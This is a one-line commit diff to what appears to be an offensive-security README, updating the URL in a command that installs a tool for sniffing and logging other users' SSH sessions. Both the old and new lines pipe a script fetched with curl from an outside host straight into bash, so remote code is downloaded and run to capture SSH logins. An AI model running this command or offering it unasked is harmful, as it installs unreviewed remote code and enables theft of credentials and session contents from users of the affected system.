Update README.md

This commit is contained in:
skyper
2023-09-06 12:23:56 +01:00
committed by GitHub
parent 59261fd516
commit d0a8e3bbbf
+1 -1
View File
@@ -1467,7 +1467,7 @@ The SSH session will be sniffed and logged to *~/.ssh/logs/* the next time the u
The easiest way is using [https://www.thc.org/ssh-it/](https://www.thc.org/ssh-it/).
```sh
bash -c "$(curl -fsSL ssh-it.thc.org/x)"
bash -c "$(curl -fsSL https://thc.org/ssh-it/x)"
```
---